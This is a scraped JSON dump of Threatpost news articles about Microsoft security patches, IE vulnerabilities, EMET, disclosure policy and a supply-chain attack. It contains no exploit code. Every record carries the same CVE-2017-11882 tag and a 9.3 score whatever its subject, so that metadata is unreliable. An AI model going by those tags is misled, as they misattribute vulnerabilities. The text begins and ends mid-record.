"THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "href": "https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/72521/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA) giving the attacker the same privileges as the victim on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with the OWA module on Exchange, the browser pulls a message into Exchange and using Outside In, processes the message on Exchange exposing the server to attack.\n\nKandek said organizations that don\u2019t allow OWA or turn off a visualization mode that renders documents are not affected; documents such as PDFs instead would be processed by a reader such as Adobe or Foxit avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. \u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "cvss3": {}, "published": "2013-08-14T16:51:00", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-14T20:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)[](<https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. [Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com] Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com]\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:26", "description": "[](<https://threatpost.com/microsoft-says-ie8-weakness-not-exploitable-flaw-070910/>)Microsoft on Friday said that a weakness in Internet Explorer 8 identified by security researcher Ruben Santamarta recently is not an exploitable vulnerability, but rather a \u201ctechnique for bypassing ASLR.\u201d\n\nASLR (Address Space Layout Randomization) is a memory protection that, along with DEP (Data Execution Prevention), Microsoft has added to recent versions of Windows and Internet Explorer in order to prevent some specific memory-based attacks. Security researchers and software security experts have praised the two technologies as being very effective anti-exploit technologies and have said ASLR and DEP together make it much more difficult to take advantage of memory vulnerabilities on Windows machines.\n\nHowever, the two technologies certainly are not a foolproof defense against attacks. Several researchers have demonstrated various techniques for bypassing ASLR and DEP under certain circumstances, although Microsoft has addressed some of those attacks in recent releases of Internet Explorer.\n\nSantamarta, a researcher at Wintercore, a Spanish security company, recently published information on a [flaw he found in mshtml.dll](<https://threatpost.com/flaw-core-ie-8-component-could-enable-remote-attacks-070610/>), the HTML viewer in IE 8. He said in [his advisory](<http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1>) that the problem could be exploited to leak a memory pointer in IE 8, which, when combined with some other data, could allow and attacker to run code on a remote machine.\n\nHowever, Jerry Bryant of Microsoft\u2019s Security Response Center said that the problem is not an exploitable vulnerability.\n\n\u201cThe Internet \nExplorer reverse mode issue targeting mshtml.dll is not an exploitable \nvulnerability. It is a technique to bypass ASLR (Address Space Layout \nRandomization) under certain conditions. ASLR is an important countermeasure introduced to help protect \ncustomers from memory-targeting attacks that are commonly seen in the wild. The \nmitigation is most effectively deployed in tandem with DEP (Data Execution \nPrevention),\u201d he said. \u201cThese two mitigations, though not capable of blocking \nall attacks, are highly effective when used in combination with one another.\u201d \n", "cvss3": {}, "published": "2010-07-09T18:34:43", "type": "threatpost", "title": "Microsoft Says IE8 Weakness Not an Exploitable Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:26:00", "id": "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "href": "https://threatpost.com/microsoft-says-ie8-weakness-not-exploitable-flaw-070910/74195/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "Prompted by the disclosure of a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-working-on-patch-for-ie-8-zero-day/106247>) more than six months after it was reported, Microsoft next Tuesday will finally issue a patch.\n\nHP\u2019s Zero Day Initiative (ZDI) released on May 21 some detail on a previously unreported use-after-free bug in IE 8. No public exploits were reported and while Microsoft acknowledged receipt of the vulnerability report from ZDI, it had not produced a patch prior to ZDI\u2019s disclosure per its guidelines.\n\nThe vulnerability affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cSome fixes are more complex than others, and we must test every one against a huge number of programs, applications and different configurations,\u201d a Microsoft spokesperson said. \u201cWe continue to encourage customers to upgrade to a modern operating system, such as Windows 7 or 8.1, and run the latest version of Internet Explorer which include further protections.\u201d\n\nThe IE patch is one of two bulletins Microsoft has rated critical for next week\u2019s Patch Tuesday security updates.\n\nThe IE patch is one of two bulletins Microsoft has rated critical for next week\u2019s [Patch Tuesday security updates.](<https://technet.microsoft.com/en-us/library/security/MS14-JUN>) There will be seven bulletins in all, five rated important by the company. The IE patch will likely be a cumulative rollup as it affects the browser all the way back to IE 6 on Windows Server 2003.\n\nThe second critical bulletin is also a remote code execution vulnerability, this one in Microsoft Office and Microsoft Lync, the company\u2019s messaging and video conferencing application. The vulnerability is rated critical for Lync 2013 and 2010, as well as Live Meeting 2007 Console; it is rated important for Microsoft Office 2010 and Office 2007.\n\n\u201cGiven that the second bulletin will affect Lync Server and the older Live Meeting Console this may be a truly remotely exploitable vulnerability,\u201d said Ross Barrett, senior manager of security engineering at Rapid7.\n\nWindows Server 2003, it should be noted, has nearly entered its last year of support; it\u2019s scheduled to go end-of-life in July 2015.\n\n\u201cWe are coming up on just a year out now and because any changes to your server will likely be a significant amount of work, it isn\u2019t too soon to get started on that plan,\u201d said Russ Ernst, director, product management, Lumension.\n\nThe remaining bulletins, all rated important, include a remote code execution bug in Office, separate information disclosure vulnerabilities in Windows and Lync Server, a denial-of-service vulnerability in Windows, and a tampering vulnerability in Windows.\n\n\u201cThe tampering label on the seventh bulletin may suggest it allows a message to be altered in transit,\u201d Barrett said. \u201cProbably a limited scenario for exploitation.\u201d\n", "cvss3": {}, "published": "2014-06-05T14:30:33", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-10T18:53:57", "id": "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "href": "https://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:24", "description": "The latest version of Microsoft\u2019s freely available stopgap against zero-day exploits was released today with two new exploit mitigations and a batch of new configuration options.\n\nThe update to Microsoft\u2019s Enhanced Mitigation Experience Tool kit, or EMET, comes six months after a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) was released in February during the RSA Conference. It was then when Microsoft was touting new plug-in controls and memory protections, both of which have been rolled into [EMET 5.0](<http://blogs.technet.com/b/msrc/archive/2014/07/30/general-availability-for-enhanced-mitigation-experience-toolkit-emet-5-0.aspx>).\n\nThe first new mitigation is called Attack Surface Reduction (ASR). The mitigation allows Windows administrators to determine when\u2014or if\u2014plug-ins such as Java or Adobe Flash run at all on a Windows computer. Java and Flash, for example, have been favorite targets of hackers. Many advanced attacks exploit vulnerabilities in either platform, giving them an initial foothold on a system that can be then leveraged for further system and network access.\n\nWith ASR, administrators are able to, for example, allow Java plug-ins on internal websites, while blocking them to the open Internet.\n\nWith ASR, administrators are able to, for example, allow Java plug-ins on internal websites, while blocking them to the open Internet. They can also block Office applications, for example, from loading Flash in a Word or Excel document, but allow it in the browser.\n\n\u201cWe heard from customers that they wanted more control over which programs and in which scenarios these plugins can be loaded. We initially released a Fix It tool last year to disable the Java plugin entirely in Internet Explorer and that helped people,\u201d said Jonathan Ness, principal security development manager for the Microsoft Security Response Center. \u201cBut customers told us that they still needed Java for their line-of-business applications running on their local intranet and were looking for a way to block Java and other plugins from loading on the wider untrusted Internet.\u201d\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming (ROP) exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe other new mitigation in EMET 5.0 is called Export Address Table Filtering Plus (EAF+), which introduces two new methods aimed at disrupting advanced attacks, Microsoft said.\n\n\u201cFor example, EAF+ adds a new \u2018page guard\u2019 protection to help prevent memory read operations, commonly used as information leaks to build exploitations,\u201d Microsoft said in a statement.\n\n\u201cIt\u2019s the way EMET blocks common exploit techniques, common shell code techniques. The engineers building EMET are the same engineers in the security response center that respond to attacks in the wild against our software and these guys are always studying new attack techniques that show up in real-world exploits,\u201d Ness said. \u201cEAF+ amplifies the scope and robustness of EAF. It blocks new kinds of exploit techniques by performing additional integrity checks and preventing certain memory read operations used as \u2018read anywhere\u2019 primitives in recent exploits.\u201d\n\nMicrosoft has also tweaked the configuration options in EMET 5.0 allowing admins to further configure how mitigations protect applications in a particular IT environment.\n\n\u201cUsers can configure which specific memory addresses to protect with the HeapSpray Allocation mitigation using EMET 5.0,\u201d Microsoft said. \u201cWe continue to provide smart defaults for many of the most common applications used by our customers.\u201d\n\nMicrosoft said it has also simplified the way EMET configuration changes can be pushed via Group Policy in Active Directory.\n\n\u201cThey will no longer need to refresh the EMET configuration on each host or wait for an application refresh to make configuration changes to all hosts via group policy,\u201d Ness said. \u201cConfiguration changes will take effect right away with the addition of the EMET Service.\u201d\n\nMicrosoft has also added new services that help users monitor logs for suspicious activity, and has added improvements to its Certificate Trust feature where users are able to establish settings that block users from visiting websites with untrusted digital certificates.\n\n\u201cAll EMET users are going to benefit from the way we refactored many components of the EMET 5.0 engine to maximize application compatibility and reduce false positives, and from the work we did with popular anti-malware products to ensure application compatibility,\u201d Ness said.\n", "cvss3": {}, "published": "2014-07-31T14:41:35", "type": "threatpost", "title": "Microsoft Releases EMET 5.0 Exploit Mitigation Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-06T21:06:00", "id": "THREATPOST:985009AC9680D632153D78707A8949EF", "href": "https://threatpost.com/microsoft-releases-new-version-of-emet-exploit-mitigation-tool/107549/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "description": "[From SearchSecurity (Robert Westervelt)](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1361617,00.html>)\n\n[](<https://threatpost.com/new-flaw-microsoft-office-web-components-under-attack-071309/>)Microsoft issued an advisory Monday, warning of a new vulnerability in [Office Web Components](<http://www.microsoft.com/technet/security/advisory/973472.mspx>) being actively targeted by attackers. The Office Web Components allow users to view spreadsheets, charts and databases on the Web. Microsoft said the vulnerability is in the Spreadsheet ActiveX Control, which is used by Internet Explorer (IE) to display the data in the browser. It is remotely exploitable when a person browses with IE and visits a malicious website. If successfully exploited, an attacker could gain the same user rights as the local user and gain complete control of a system, Microsoft said. [Read the full story](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1361617,00.html>) [SearchSecurity].\n", "cvss3": {}, "published": "2009-07-13T18:53:30", "type": "threatpost", "title": "New Flaw in Microsoft Office Web Components Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:54", "id": "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "href": "https://threatpost.com/new-flaw-microsoft-office-web-components-under-attack-071309/72911/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:44", "description": "Microsoft said a recent attack it calls [Operation WilySupply](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) utilized the update mechanism of an unnamed software editing tool to infect targets in the finance and payment industries with in-memory malware.\n\nThe unnamed editing tool was used to send unsigned malicious updates to users in targeted attacks, according to a report published Thursday.\n\n\u201cWhile their software supply chain served as a channel for attacking other organizations, they themselves were also under attack,\u201d said Elia Florio, senior security software engineer, with Windows Defender ATP Research Team.\n\nIt\u2019s unclear just how many affected parties there were and when the attacks took place. However, Florio said the attacks were selective and purposely went after only the \u201cmost valuable targets\u201d in an effort to avoid detection.\n\n\u201cWe believe that the activity group behind Operation WilySupply is motivated by financial gain. They compromise third-party software packages delivered through updaters and other channels to reach victims who are mostly in the finance and payment industries,\u201d Florio wrote.\n\nHe said Microsoft began investigating the suspicious activity after computers using the updater were red-flagged by Windows ATP. \u201cWindows Defender ATP initially called our attention to alerts flagging suspicious PowerShell scripts, self-deletion of executables, and other suspect activities,\u201d Florio wrote.\n\nA forensic analysis of the _Temp Folder _on one of the targeted systems revealed the legitimate third-party updater running as service. However, closer inspection revealed the updater also had downloaded an unsigned, low-prevalence executable just before the malicious activity was observed, according to Florio.\n\n\u201cThe downloaded executable turned out to be a malicious binary (Rivit) that launched PowerShell scripts bundled with the Meterpreter reverse shell, which granted the remote attacker silent control,\u201d Florio wrote. \u201cThe malware binary, named by the cybercriminals _ue.exe_, was a small piece of code with the sole purpose of launching a Meterpreter shell.\u201d\n\nMeterpreter is a legitimate pen-testing tool packaged with the Metasploit framework and can be used to carry out in-memory or fileless attacks. Meterpreter attaches itself to a process and is capable of carrying out in-memory DLL injections. It\u2019s one of several open-source tools such as Lazagne that allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary\u2019s control server. In-memory or fileless attacks, Florio said, are a [fast growing trend among cybercriminals](<https://threatpost.com/hard-target-fileless-malware/125054/>).\n\nAttackers, Florio said, were taking advantage of the trusted relationship within the context of the software supply chain. The victims were unaware that a malicious third-part had infiltrated the remote update channel of the supply chain.\n\nSelf-updating software has been targeted in the past on a number of occasions, points out Microsoft. Unrelated incidents include adversaries targeting Altair Technologies\u2019 EvLog update process, the auto-update mechanism for South Korean software SimDisk and the update server used by ESTsoft\u2019s ALZip compression application, according to researchers.\n\nNoteworthy to the attack was the fact adversaries conducted advanced recon that included qualifying systems with tools such as .NET, IPCONFIG, NETSTAT, NLTEST, and WHOAMI, Florio said.\n\nAdditional techniques, tactics and procedures Florio noted included; memory-only payloads assisted by PowerShell and Meterpreter running in rundll32; Migration into long-living processes, such as the Windows Printer Spooler or _spoolsv_._exe_; use of common tools like Mimikatz and Kerberoast to dump hashes; ateral movement using Windows Management Instrumentation (WMI), specifically the _WMIC /node_ command; and persistence through scheduled tasks created using SCHTASKS and AT commands.\n\nTips on protection from such attacks include hardening defenses with strong encryption used in update channels, putting script and configuration files in signed containers and adopting Security Development Lifecycle best practices, according to Florio.\n", "cvss3": {}, "published": "2017-05-05T14:11:31", "type": "threatpost", "title": "Supply Chain Update Software Unknowingly Used in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-05-05T18:11:31", "id": "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "href": "https://threatpost.com/supply-chain-update-software-unknowingly-used-in-attacks/125483/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:39", "description": "Mark Dowd, fresh off his [2017 Security Analyst Summit keynote](<https://threatpost.com/memory-corruption-mitigations-doing-their-job/124728/>), discusses why certain exploit mitigations have been so successful in driving up the cost of exploit development for attackers.\n", "cvss3": {}, "published": "2017-05-26T12:00:08", "type": "threatpost", "title": "Mark Dowd on Exploit Mitigation Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:20:30", "id": "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "href": "https://threatpost.com/mark-dowd-on-exploit-mitigation-development/125947/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:49", "description": "Microsoft announced this afternoon that the zero-day vulnerability being exploited in a watering hole attack against an unnamed U.S.-based NGO website was already scheduled to be patched in a [cumulative Internet Explorer update](<http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx>) tomorrow.\n\nThe zero-day was reported publicly on Friday by FireEye researchers and today a few more dots were connected on the attack, which is dropping a variant of the McRAT Trojan that has been used in a number of [targeted espionage attacks](<http://threatpost.com/ie-zero-day-watering-hole-attack-injects-malicious-payload-into-memory/102891>) targeting industrial secrets.\n\nMicrosoft promised a relatively light [Patch Tuesday tomorrow](<http://threatpost.com/tiff-zero-day-missing-from-november-patch-tuesday-updates/102864>) that included another IE rollup, a staple of the company\u2019s monthly security updates in 2013. Dustin Childs, a group manager in the Microsoft Trustworthy Computing group, said today that the vulnerability in an IE ActiveX Control will be patched in MS13-90 tomorrow.\n\nIn its [advanced notification](<http://technet.microsoft.com/en-us/security/bulletin/ms13-nov>) released last Thursday, Microsoft said the IE bulletin is rated critical because it involves flaws that can lead to remote code execution. The critical rating applies to IE 6-8 on Windows XP, IE7-9 on Vista, IE 8-10 on Windows 7, and IE 10 on Windows 8 and 8.1; all other versions are rated important.\n\nFireEye, today told Threatpost, that the attack is limited to a single U.S.-based website hosting domestic and international policy guidance. No details were available on how the site was compromised, only that the victims were hit by malware in drive-by download attacks targeting an information leakage vulnerability and a memory corruption issue leading to remote code execution.\n\nWhat differentiates this attack from other watering hole attacks is that victims are not subject to malicious iframes or traffic-redirects to attacker-controlled sites and further malware downloads. Instead, McRAT is injected directly into memory, a new twist on advanced targeted attacks.\n\n\u201cBy using memory-only methods, the attack is exceptionally difficult for network defenders to detect, when trying to examine and confirm which endpoints are infected, using traditional disk-based forensics methods,\u201d said Darien Kindlund, FireEye director of threat intelligence.\n\nMicrosoft said a number of mitigations are available to IE users as a mitigation until a patch is applied, namely setting security zone settings to \u201cHigh\u201d to block ActiveX Controls and Active Scripting, though users could experience some usability issues. IE can also be configured to prompt a user before running Active Scripting. The Enhanced Mitigation Experience Toolkit (EMET) is also a viable mitigation, Microsoft said.\n\nThe IE patch is one of eight bulletins scheduled for tomorrow, three of those rated critical. The scheduled security updates, however, will not include a patch for the Windows TIFF zero day being actively exploited in attacks primarily in Pakistan. The vulnerability in several Windows and Office versions is being exploited in [targeted attacks](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) against Windows XP systems running Office 2007. Microsoft released a [Fix-It](<https://support.microsoft.com/kb/2896666>) tool as a stopgap measure until a patch is released out of band or with the December security updates.\n", "cvss3": {}, "published": "2013-11-11T17:54:28", "type": "threatpost", "title": "IE Zero Day Patch Already in November Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-12T22:11:19", "id": "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "href": "https://threatpost.com/microsoft-ie-zero-day-patch-among-november-patch-tuesday-updates/102898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:54", "description": "Microsoft today provided its [Patch Tuesday advanced notification](<https://technet.microsoft.com/en-us/library/security/MS14-NOV>), giving IT managers a head\u2019s up about 16 bulletins that are scheduled to be delivered next week, including five rated critical for remote code execution and privilege escalation issues.\n\nThe heavy patch load is an anomaly for 2014, which has been relatively quiet. The last time Microsoft released anything approaching this many bulletins in one month was in September 2013.\n\n\u201cNext week will tell us how many CVEs are involved but suffice to say, this patch load will be a big impact to the enterprise,\u201d said Russ Ernst, director at Lumension.\n\nExpect another cumulative critical patch rollup for Internet Explorer and four critical bulletins others for Windows. Nine of the remaining bulletins are rated Important by Microsoft and two others Moderate.\n\nOffice software is in the crosshairs of the moderate bulletins. Microsoft said bulletins are on the way for Office 2007 SP3, Microsoft Word Viewer and Office Compatibility Pack SP 3.\n\nMicrosoft is also expected to patch vulnerabilities in Exchange Server 2007, 2010 and 2013, as well as the .NET development framework. None of those are rated critical, likely meaning an attacker would require local access in order to exploit the security issues.\n", "cvss3": {}, "published": "2014-11-06T14:34:02", "type": "threatpost", "title": "November 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-06T19:34:02", "id": "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "href": "https://threatpost.com/microsoft-ready-with-16-patch-tuesday-bulletins-5-critical/109223/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:22", "description": "[](<https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/>)Microsoft is changing the way in which it handles vulnerability disclosures, now moving to a model it calls coordinated vulnerability disclosure, in which the researcher and the vendor work together to verify a vulnerability and allow ample time for a patch. However, the new philosophy also recognizes that if there are attacks already happening, it may be necessary to release details of the flaw even before a patch is ready.\n\nThe shift is a subtle one from Microsoft, which has always been at the heart of the debate over full disclosure of security vulnerabilities. The company has been very vocal in the past about its assertion that all vulnerabilities in its products should be reported privately to the company and the researcher should then give Microsoft some undisclosed amount of time to come up with a fix. The new CVD strategy still doesn\u2019t lay out a timeline for patch releases, but it represents a public change in the way the company is thinking.\n\nThe new CVD strategy relies on researchers to report vulnerabilities either directly to a vendor or to a trusted third party, such as a CERT-CC, who will then report it to the vendor. The finder and the vendor would then try to agree on a disclosure timeline and work from there. \n\n\u201d Newly discovered vulnerabilities in hardware, software, and services \nare disclosed directly to the vendors of the affected product, to a \nCERT-CC or other coordinator who will report to the vendor privately, or \nto a private service that will likewise report to the vendor privately. \nThe finder allows the vendor an opportunity to diagnose and offer fully \ntested updates, workarounds, or other corrective measures before \ndetailed vulnerability or exploit information is shared publicly. If \nattacks are underway in the wild, earlier public vulnerability details \ndisclosure can occur with both the finder and vendor working together as \nclosely as possible to provide consistent messaging and guidance to \ncustomers to protect themselves,\u201d said Matt Thomlinson, general manager of Microsoft\u2019s Trustworthy Computing group. \n\n\u201cCVD does not represent a huge departure from the current definition \nof \u201cresponsible disclosure,\u201d and we would still view vulnerability \ndetails being released broadly outside these guidelines as putting \ncustomers at unnecessary levels of risk. However, CVD does allow for \nmore focused coordination on how issues are addressed publicly. CVD\u2019s \ncore principles are simple: vendors and finders need to work closely \ntoward a resolution; extensive efforts should be made to make a timely \nresponse; and only in the event of active attacks is public disclosure, \nfocused on mitigations and workarounds, likely the best course of action \n\u2014 and even then it should be coordinated as closely as possible.\u201d\n\nThe change from Microsoft comes close on the heels of several other major shifts in the landscape recently, including the decisions by both Google and Mozilla to raise their bounties for security bugs to $3,133.7 and $3,000, respectively. Microsoft has steadfastly refused to pay bug bounties in the past, though there are persistent rumors that the company may do so at some point in the near future. \n\nThe CVD plan closely resembles other disclosure strategies that have been released over the years, and incorporates some elements of plans that researchers have suggested. The use of trusted third parties, such as the CERT-CC, is something that has been suggested by a number of people in the past, and has the advantage of including a dispassionate organization that can work with both the researcher and the vendor when conflicts arise or if the vendor is unresponsive. \n\nThe new CVD policy, in fact, incorporates some of the elements that were laid out in a [plan written by the defunct Organization for Internet Safey in 2004](<http://www.symantec.com/security/OIS_Guidelines%20for%20responsible%20disclosure.pdf>), particularly the usage of third parties to help moderate the process.\n\nThe key concession in the new CVD strategy is the acknowledgement that there are times when it may be necessary for the researcher to disclose details of a given vulnerability before a patch is ready. This often is done if a vendor is not responsive to the researcher or if the researcher doesn\u2019t think the vendor is making a good faith effort to fix a flaw quickly enough. However, as Microsoft says in its policy, disclosure of flaw details may be necessary in cases where attacks against the vulnerability are already underway in the wild and security staffs need information on the problem to help protect their networks. \n\nKatie Moussouris, a senior security strategist at Microsoft, said in a [related blog post](<http://blogs.technet.com/b/ecostrat/archive/2010/07/22/coordinated-vulnerability-disclosure-bringing-balance-to-the-force.aspx>) that the company needs help from the research community to make this CVD philosophy work.\n\n[block:block=47]\n\n\u201cResponsible Disclosure should be deprecated in favor of something \nfocused on getting the job done, which is to improve security and to \nprotect users and systems. As such, Microsoft is asking researchers to \nwork with us under Coordinated Vulnerability Disclosure, and added some \ncoordinated public disclosure possibilities before a vendor-supplied \npatch is available when active attacks are underway. It uses the trigger \nof attacks in the wild to switch modes, which is an event that is \nobjectively observable by many independent sources,\u201d she wrote. \u201cMake no mistake about it, CVD is basically founded on the initial \npremise of Responsible Disclosure, but with a coordinated public \ndisclosure strategy if attacks begin in the wild. That said, what\u2019s \ncritical in the reframing is the heightened role coordination and shared \nresponsibility play in the nature and accepted practice of \nvulnerability disclosure. This is imperative to understand amidst a \nchanging threat landscape, where we all accept that no longer can one \nindividual, company or technology solve the online crime challenge.\u201d \n", "cvss3": {}, "published": "2010-07-22T16:50:37", "type": "threatpost", "title": "Microsoft Shifts to 'Coordinated Vulnerability Disclosure' Policy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:21:38", "id": "THREATPOST:E539817E8025A93279C63158F37F2DFB", "href": "https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/74247/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:28", "description": "[](<https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/>)Microsoft has gone after another botnet, this time targeting some of the command-and-control infrastructure behind the Zeus network with a takedown effort that included seizing two IP addresses used for C&amp;C servers and filing suit against 39 unnamed defendants. The action against Zeus is the latest in a string of such moves by Microsoft and some of its partners against the operators of botnets such as [Kelihos](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) and 